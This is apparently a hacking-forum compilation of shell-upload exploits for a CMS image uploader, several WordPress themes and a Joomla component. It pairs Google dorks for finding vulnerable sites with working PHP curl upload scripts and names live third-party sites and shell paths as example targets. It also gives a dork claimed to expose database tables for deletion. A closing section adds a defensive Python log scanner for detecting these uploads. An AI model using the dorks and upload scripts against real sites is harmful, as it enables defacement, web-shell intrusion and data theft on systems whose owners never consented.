"CMS admin Image Uploader" Shell Upload Vulnerability
Google Dorks:
inurl: "default_image.asp"
inurl: "default_imagen.asp"
inurl: "/ box_image.htm"
You will get an upload option after clicking a link you found using the dorks.
Now choose your deface page or shell and upload it.
Format:
shell.asp,. jpg, shell.php;.. html php jpg, gif, jpg, png, pdf, zip......
You can also use Tamper Data ...
Live Demo:
http://www.pballcentral.com/admin% 5Cincl ... _image.asp
=====================================================
[#] Wordpress ..... brainstorm shell upload [#]
Requirements:
1º Shell: THA.php in the same location
2º Create the file: inject.php (run it online or with XAMPP)
PHP code:
<?php
$uploadfile="THA.php";
$ch = curl_init("http://target.com/wordpress/wp-content/themes/brainstorm/functions/jwpanel/scripts/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/wordpress/wp-content/themes/brainstorm/functions/jwpanel/scripts/uploadify/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Google Dork:
inurl:/wp-content/themes/brainstorm/ site:
Example target without the edited link:
http://www.kscm.ie/wp-content/themes/bra...?post_id=9
Change:
/wp-content/themes/brainstorm/scripts/piecemaker/piecemaker-xml.php?post_id=9
to
/wp-content/themes/brainstorm/functions/jwpanel/scripts/uploadify/uploadify.php
Full example:
http://www.kscm.ie/wp-content/themes/bra...oadify.php
Find your shell here:
http://target/wp-content/uploads/year/month/THA.php
Example:
http://www.kscm.ie/wp-content/uploads/2013/08/THA.php
====================================================
WordPress GeoPlaces Themes (Upload shell exploit)
# Exploit Title: WordPress GeoPlaces Themes >> upload shell exploit
# Google Dork: "inurl:wp-content/themes/GeoPlaces/"
# Date: 2/6/2013
# Exploit Author: xmayaroos
# Vendor Homepage: http://www.geotheme.com/
# Version: [app version - REQUIRED]
# Tested on: [relevant os]
# Greeting To : sec4ever members
/wp-content/themes/GeoPlaces/monetize/upload/
find your shell
/wp-content/uploads/2013/08 (Year / Month)
===================================================
Joomla com_extplorer Components shell upload Vulnerability
#################################
# ISlamic Republic Of Iran Security Team
# http://Www.IrIsT.Ir
#################################
# Exploit Title : joomla com_extplorer Components shell upload Vulnerability
# Author : IrIsT Security & Researcher Team
# Discovered By : Am!r
# Home : http://IrIsT.Ir - http://IrIsT.Ir/forum
# Facebook Page : http://www.facebook.com/pages/IrIsT-Hack...7267857573
# Software Link : http://www.joomla.org
# Security Risk : High
# Tested on : Linux
# Dork : inurl:administrator/components/com_extplorer
#################################
Exploit :
Post.php
<?php
$uploadfile="Amir.php.gif";
$ch = curl_init("http://www.exemple.com/administrator/components/com_extplorer/uploadhandler.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access :
http://www.exemple.com/images/stories/Amir.php.gif
#################################
# Greats : B3HZ4D - C0dex - TaK.FaNaR - F@rid - Beni_Vanda - dr.koderz - Mr Zer0 - Smartprogrammer - z3r0
# sajjad13and11 - silent - Bl4ck M4n - AHAAD - ARTA - Dj.TiniVini - E2MA3N - Immortal Boy - IR Anonymous
# Mikili - Mr.F@RDIN - Net.W0lf - skote_vahshat - Net.W0lf - MedRiK - 4xp3r-bh - Sokout - mehdiv - soulz
# & All Members In IrIsT.Ir
#################################
#Tnx To : PacketstormSecurity.Org - 1337day.com - exploit-db.com
#################################
=============================================
Dork : allinurl:index.php?db=information_schema
Go to google.com and enter this dork. Google will show you about 161,000 results; guess how many websites are vulnerable to this attack!
This dork bypasses the admin username and password and takes you directly to the information schema tables to get data, and you can delete data!
===================================================
Wordpress theme GTD File Upload Vulnerability.
#Google Dork: inurl:"/wp-content/themes/GTD/upload/" or allintext:"powered by WordPress. GTD theme by Templatic"
[+]exploit
-----------------------------------------------------------------------
example : http://localhost/wp-content/themes/GTD/upload/
Shell access: http://localhost/wp-content/themes/GTD/attachments/yourshell.php
Enjoy Brothers!
Translate it yourself!
I'm just sharing XD
Once you become a pro, don't forget your friends :D
Leaving my nick: ./Shanjunisme98
Source: Exploit DB
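
Seen from the server side, the upload flaws listed above leave a recognisable trace in access logs: a POST to one of the named upload handlers, and requests for a script-named file inside a directory that should only hold media. The Python below is an added example, not code from the original post or from the advisories it quotes; it flags both patterns. The log lines are constructed samples in common log format, and the extension list and function names are assumptions.

```python
import re
from urllib.parse import unquote

# Upload endpoints and drop directories named in the advisories above.
UPLOAD_HANDLERS = (
    "/uploadify/uploadify.php",
    "/com_extplorer/uploadhandler.php",
    "/themes/GeoPlaces/monetize/upload/",
    "/themes/GTD/upload/",
)
DROP_DIRS = ("/wp-content/uploads/", "/images/stories/", "/themes/GTD/attachments/")
# A script extension anywhere in the file name, so "x.php.gif" and
# "x.asp;.jpg" are caught as well as plain "x.php" (assumed extension list).
SCRIPT_NAME = re.compile(r"\.(php\d?|phtml|asp|aspx)($|[.;])", re.I)
# Common/combined log format: client, timestamp, request line, status.
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3})')

def classify(line):
    """Return (ip, finding, path, status) for a suspicious line, else None."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    ip, method, url, status = m.groups()
    path = unquote(url.split("?", 1)[0])
    name = path.rsplit("/", 1)[-1]
    if method == "POST" and any(h in path for h in UPLOAD_HANDLERS):
        return (ip, "upload-handler-post", path, int(status))
    if any(d in path for d in DROP_DIRS) and SCRIPT_NAME.search(name):
        return (ip, "script-in-upload-dir", path, int(status))
    return None

def scan(lines):
    return [f for f in map(classify, lines) if f]

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE = [
    '198.51.100.7 - - [12/Aug/2013:10:01:02 +0000] "POST /wp-content/themes/brainstorm/functions/jwpanel/scripts/uploadify/uploadify.php HTTP/1.1" 200 12',
    '198.51.100.7 - - [12/Aug/2013:10:01:09 +0000] "GET /wp-content/uploads/2013/08/THA.php HTTP/1.1" 200 512',
    '203.0.113.5 - - [12/Aug/2013:10:05:00 +0000] "GET /images/stories/Amir.php.gif HTTP/1.1" 200 300',
    '203.0.113.9 - - [12/Aug/2013:10:06:00 +0000] "GET /wp-content/uploads/2013/08/photo.jpg HTTP/1.1" 200 4096',
    '203.0.113.9 - - [12/Aug/2013:10:06:05 +0000] "GET /index.php?page=2 HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

A 200 status on a script-in-upload-dir finding means the file exists and was served, which is the case to triage first; disabling script execution in those directories and removing the unused upload handlers closes the path.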